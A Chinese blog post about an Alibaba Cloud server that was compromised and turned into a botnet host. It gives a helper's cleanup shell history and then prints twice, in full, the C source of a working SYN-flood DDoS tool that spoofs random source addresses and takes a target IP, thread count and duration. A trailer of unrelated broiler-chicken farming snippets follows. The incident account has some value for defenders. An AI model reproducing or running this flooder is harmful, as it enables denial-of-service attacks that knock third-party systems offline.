我的阿里云主机受到了攻击,并且安装了后门
可以看看我前几天的博客:
解决阿里云主机收到攻击的问题:http://hw1287789687.iteye.com/blog/2269666
解决阿里云主机受到攻击的问题 2:http://hw1287789687.iteye.com/blog/2269701
但是还是没有完全搞定.
在绝望之际,想到了他,linux高手,酷爱linux,于是请他帮忙
分分钟就找到了病灶,并且麻利地捣毁了病灶.
[root@tti3rxdZ ~]# w 19:07:22 up 58 min, 2 users, load average: 0.00, 0.02, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 130.206.40.26 18:49 10.00s 0.07s 0.07s -bash root pts/1 64.205.63.4 19:07 0.00s 0.00s 0.00s w
下面是他的历史操作:
top free -m pstree top -h top java who login w ss ss -tnlp hostname ss -nlp ls / cd / cat s.c ls ls home/huang/ vim sync.c cd / ls vim syn.c ls ls -l pstree ss vim s.c rm s.c syn.c ls rm CxxxController2.class ls find . -name "*.class" top ps aux | grep java ps aux | grep java | wc -l ps aux ls cd tmp/ ls file moni.lod cat moni.lod cat gates.lod cd .. ls pstree pstree.x11 which gshelld uname -a yum -h yum info -h rpm -h rpm --help which gshelld rpm -qf /usr/sbin/gshelld objdump -d /usr/sbin/gshelld readelf -d /usr/sbin/gshelld rpm -qf /usr/sbin/gshelld file /usr/sbin/gshelld stat /usr/sbin/gshelld pstree which getty which AliHids which ntpd rpm -qf /usr/sbin/ntpd which mingetty rpm -qf /sbin/mingetty cd /usr/sbin/ ls -l gshelld ls -l
终于找到了flood文件(肉鸡的病根),见附件
s.c:
// Improved SSYN Script - random ports, random flags. by SPAI3N.
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <time.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
char ip[17];
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(rand()%54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr(ip);
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(rand()%65535);
tcph->seq = rand();
tcph->ack_seq = 0;
tcph->res1 = 0;
tcph->res2 = 0;
tcph->doff = 5;
tcph->psh = 0;
tcph->syn = 1;
tcph->window = htons(65535);
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(rand()%54321);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(rand()%54321);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
int psh = 0;
int res1 = 0;
int res2 = 0;
while(1)
{
if(psh > 1) psh = 1;
if(res1 > 4) res1 = 0;
if(res2 > 3) res2 = 0;
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
setup_ip_header(iph);
setup_tcp_header(tcph);
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
tcph->dest = htons(rand()%65535);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->ack_seq = 1;
tcph->psh = psh;
tcph->res1 = res1;
tcph->res2 = res2;
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
psh++;
res1++;
res2++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 5){
fprintf(stdout, "ISSYN v1.0 - Improved by Spai3N\nInvalid parameters!\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
srand(time(0));
int num_threads = atoi(argv[2]);
int maxpps = atoi(argv[3]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
fprintf(stderr, "Start flooding ...\n", argv[1]);
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stderr, "Flooding: %s\n", argv[1]);
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}
syn.c:
// Improved SSYN Script - random ports, random flags. by SPAI3N.
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <time.h>
#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9
static unsigned long int Q[4096], c = 362436;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
register unsigned long sum = 0;
while( count > 1 ) { sum += *buf++; count -= 2; }
if(count > 0) { sum += *(unsigned char *)buf; }
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
struct tcp_pseudo
{
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
unsigned short total_len = iph->tot_len;
pseudohead.src_addr=iph->saddr;
pseudohead.dst_addr=iph->daddr;
pseudohead.zero=0;
pseudohead.proto=IPPROTO_TCP;
pseudohead.length=htons(sizeof(struct tcphdr));
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
unsigned short output = csum(tcp,totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph)
{
char ip[17];
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
iph->id = htonl(rand()%54321);
iph->frag_off = 0;
iph->ttl = MAXTTL;
iph->protocol = 6;
iph->check = 0;
iph->saddr = inet_addr(ip);
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(rand()%65535);
tcph->seq = rand();
tcph->ack_seq = 0;
tcph->res1 = 0;
tcph->res2 = 0;
tcph->doff = 5;
tcph->psh = 0;
tcph->syn = 1;
tcph->window = htons(65535);
tcph->check = 0;
tcph->urg_ptr = 0;
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(rand()%54321);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if(s < 0){
fprintf(stderr, "Could not open raw socket.\n");
exit(-1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
setup_ip_header(iph);
setup_tcp_header(tcph);
tcph->dest = htons(rand()%54321);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
int tmp = 1;
const int *val = &tmp;
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
exit(-1);
}
init_rand(time(NULL));
register unsigned int i;
i = 0;
int psh = 0;
int res1 = 0;
int res2 = 0;
while(1)
{
if(psh > 1) psh = 1;
if(res1 > 4) res1 = 0;
if(res2 > 3) res2 = 0;
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
setup_ip_header(iph);
setup_tcp_header(tcph);
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
tcph->dest = htons(rand()%65535);
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
tcph->seq = rand_cmwc() & 0xFFFF;
tcph->source = htons(rand_cmwc() & 0xFFFF);
tcph->ack_seq = 1;
tcph->psh = psh;
tcph->res1 = res1;
tcph->res2 = res2;
tcph->check = 0;
tcph->check = tcpcsum(iph, tcph);
pps++;
psh++;
res1++;
res2++;
if(i >= limiter)
{
i = 0;
usleep(sleeptime);
}
i++;
}
}
int main(int argc, char *argv[ ])
{
if(argc < 5){
fprintf(stdout, "ISSYN v1.0 - Improved by Spai3N\nInvalid parameters!\nUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
exit(-1);
}
srand(time(0));
int num_threads = atoi(argv[2]);
int maxpps = atoi(argv[3]);
limiter = 0;
pps = 0;
pthread_t thread[num_threads];
int multiplier = 20;
int i;
fprintf(stderr, "Start flooding ...\n", argv[1]);
for(i = 0;i<num_threads;i++){
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stderr, "Flooding: %s\n", argv[1]);
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
{
usleep((1000/multiplier)*1000);
if((pps*multiplier) > maxpps)
{
if(1 > limiter)
{
sleeptime+=100;
} else {
limiter--;
}
} else {
limiter++;
if(sleeptime > 25)
{
sleeptime-=25;
} else {
sleeptime = 0;
}
}
pps = 0;
}
return 0;
}
相关推荐
【肉鸡行业上市公司概述】 肉鸡行业在中国是一个重要的农业板块,涉及从种鸡繁育到肉鸡饲养再到屠宰加工的全过程。本报告聚焦于中国的肉鸡行业上市公司,深入剖析其经营状况和市场地位。 1. **全产业链上市公司** ...
肉鸡作为全球最常见的家禽之一,其养殖历史源远流长。2021年的研究指出,中国的肉鸡行业经历了出栏率的稳健增长,尽管面临诸多压力,依然保持前行。其中,白羽肉鸡和黄羽肉鸡是两大主要的肉鸡品种。白羽肉鸡以其快速...
YOLOv9养殖场肉鸡健康状态检测权重,包含养殖场肉鸡健康状态检测数据集 ;数据集目录已经配置好,划分好 train,val, test,并附有data.yaml文件,yolov5、yolov7、yolov8,yolov9等算法可以直接进行训练模型,txt...
《工厂化肉鸡物联网精细饲养技术探析》这篇文章主要探讨了如何利用物联网技术提升工厂化肉鸡养殖的效率和管理水平。工厂化养殖是现代肉鸡业的主要饲养方式,虽然提高了养殖效率,但在信息化、自动化方面仍有待提升。...
公司农户保价肉鸡养殖合同.pdf
肉鸡饲养标准参考表.doc
2020年中国肉鸡行业概览.pdf
以下是几个关键的命令,帮助用户检测潜在的安全问题。 1. **使用netstat命令检查网络连接** `netstat -an` 是一个非常实用的命令,它可以显示所有活动的网络连接,包括TCP和UDP连接的本地和远程IP地址以及它们的...
1. 肠道健康的重要性:在肉鸡养殖中,肠道健康是确保生产性能的关键因素。健康的肠道可以提高肉鸡的消化吸收能力,预防呼吸道和生殖道感染,减少疾病的发生。 2. 影响肠道健康的原因:饮水卫生、肠道微生物失衡、...
【农业技术肉鸡生产】 肉鸡生产是现代农业中一个重要的组成部分,主要涉及到肉用仔鸡的饲养管理和肉用种鸡的饲养管理。本篇将详细阐述肉用仔鸡的生产特点、现代肉鸡生产体系的特点以及生长规律,同时介绍饲养方式、...
根据李家奎等人的研究,福美双对肉鸡胫骨软骨发育不良(TD)和肝功能可能产生影响,这项研究详细探讨了福美双添加对肉鸡TD发病率、血清相关酶活性、肝脏中的抗氧化酶SOD(超氧化物歧化酶)和MDA(丙二醛)含量以及增...
【肉鸡行业上市公司概述】 肉鸡行业在中国是一个重要的农业板块,涵盖了从种鸡繁育到肉鸡饲养,再到屠宰加工的整个产业链。本报告聚焦于该行业的上市公司,深入剖析其经营状况和市场地位。 1. **全产业链上市公司*...
【肉鸡饲养200问】的文档涵盖了关于肉鸡养殖的多个方面,以下是其中一些关键知识点的详细解释: 1. **肉鸡定义**:肉鸡是指专门用于食用的肉用仔鸡,与传统肉鸡(如淘汰的小公鸡和产蛋鸡)不同,现代肉鸡主要是经过...
肉鸡日粮中电解质平衡的丧失导致血液酸碱平衡的严重紊乱,以及体温升高。 人体会损失二氧化碳(CO2)和碳酸氢盐(HCO3),从而导致呼吸性碱中毒或酸中毒。 在高环境温度的热带条件下,必须将饲料中的电解质平衡调高...
2. 数据保存周期长,保证了屠宰分割历史数据的随时可调用; 3. 为企业准确的提供了屠宰分割过程中完整的溯源信息记录; 4. 实现了整个业务流程中的信息化管理,对分割后的每一个产品的所有业务流程进行跟踪管理,...
该文档是关于肉鸡屠宰、包装、存储发货的作业指导书,主要涵盖了四个核心环节:毛鸡验收、卸车过磅、洗笼上车、吊挂电麻。这些步骤都是为了确保食品安全、卫生以及生产效率。 1. **毛鸡验收**: - 目的:验证鸡只...
在大连地区,白羽肉鸡的支气管栓塞问题成为了影响肉鸡养殖业的一个重要疾病。支气管栓塞是一种严重影响鸡只呼吸系统的疾病,当病鸡体内的干酪物堵塞在支气管处,会直接导致死亡。大连地区特有的“公司+农户”的养殖...
【肉鸡挑食的管理介绍】 在肉鸡养殖过程中,饲料管理是确保肉鸡健康生长、提高经济效益的核心环节。肉鸡的日常饲养中,饲料的选择和投喂方式直接影响着肉鸡的生长速度、体重和健康状况。因此,合理管理肉鸡饲料至关...
黄羽肉鸡是中国肉鸡市场中的一个重要类别,与白羽肉鸡共同构成了我国肉鸡行业的主体。根据描述,2016年中国专业型肉鸡出栏量达到了89.9亿羽,其中黄羽肉鸡出栏39.9亿羽,占比接近一半。黄羽肉鸡的肉产量为490.5万吨...